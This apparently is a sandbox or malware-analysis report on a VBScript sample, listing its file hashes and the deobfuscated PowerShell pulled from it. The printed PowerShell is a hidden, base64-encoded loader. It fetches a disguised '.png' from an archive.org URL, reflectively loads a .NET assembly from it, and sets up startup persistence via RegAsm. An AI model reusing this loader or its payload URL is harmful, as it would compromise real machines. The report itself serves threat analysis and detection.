b8eca7fbbaca1ca8e312253746eb9d17
VBScript | MD5: b8eca7fbbaca1ca8e312253746eb9d17 | Size: 1.03 MB | text/vbscript
|
Hash | Hash Value |
|---|---|
| MD5 | b8eca7fbbaca1ca8e312253746eb9d17
|
| Sha1 | 443e1c225b12314801402f1bb139f84727668e32
|
| Sha256 | a00e23360fce193939a7f21fb3ad77d10a647aa8c927942592ff628d21a688e5
|
| Sha384 | b3602a7b62139c8312a611f73bad16ba6827bb6ed48092cb53563699f2893145c3e14545444d8316ec823299a6200914
|
| Sha512 | 309da842f605758065f51ec253d3b1e543735f22a32fef2d3eb083760af095892a40366206e16c40d39eb01d7c2c40a1a16837e7ba7ec813029560ac1bf607a1
|
| SSDeep | 12288:O6UuaXe8xZ7uF86UuaXe8xZ7uFqIM6UuaXe8xZ7uFB:ZUZLoDUZLoHUZLoB
|
| TLSH | F025D1CAB98D3504AC5D31F538345E61EADC83C0A341EBB2EE35C66371C646CAE6B791
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgxNC9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPT1BYWhWSGNxbFhleThTYnZObUxzSlhkNTVXYTA5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression" |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgxNC9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPT1BYWhWSGNxbFhleThTYnZObUxzSlhkNTVXYTA5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250814/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==AahVHcqlXey8SbvNmLsJXd55Wa09yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250814/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==AahVHcqlXey8SbvNmLsJXd55Wa09yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | Invoke-Expression |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
b8eca7fbbaca1ca8e312253746eb9d17 |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgxNC9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPT1BYWhWSGNxbFhleThTYnZObUxzSlhkNTVXYTA5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression" Malicious |
b8eca7fbbaca1ca8e312253746eb9d17 > b8eca7fbbaca1ca8e312253746eb9d17.deobfuscated.vbs > [Command #0] |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgxNC9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPT1BYWhWSGNxbFhleThTYnZObUxzSlhkNTVXYTA5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression" Malicious |
b8eca7fbbaca1ca8e312253746eb9d17 > b8eca7fbbaca1ca8e312253746eb9d17.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
b8eca7fbbaca1ca8e312253746eb9d17 > b8eca7fbbaca1ca8e312253746eb9d17.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
b8eca7fbbaca1ca8e312253746eb9d17 > b8eca7fbbaca1ca8e312253746eb9d17.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250814/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==AahVHcqlXey8SbvNmLsJXd55Wa09yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious |
b8eca7fbbaca1ca8e312253746eb9d17 > b8eca7fbbaca1ca8e312253746eb9d17.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250814/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==AahVHcqlXey8SbvNmLsJXd55Wa09yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious |
b8eca7fbbaca1ca8e312253746eb9d17 > b8eca7fbbaca1ca8e312253746eb9d17.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
b8eca7fbbaca1ca8e312253746eb9d17 > b8eca7fbbaca1ca8e312253746eb9d17.deobfuscated.vbs > [Command #0] > [PowerShell Command] |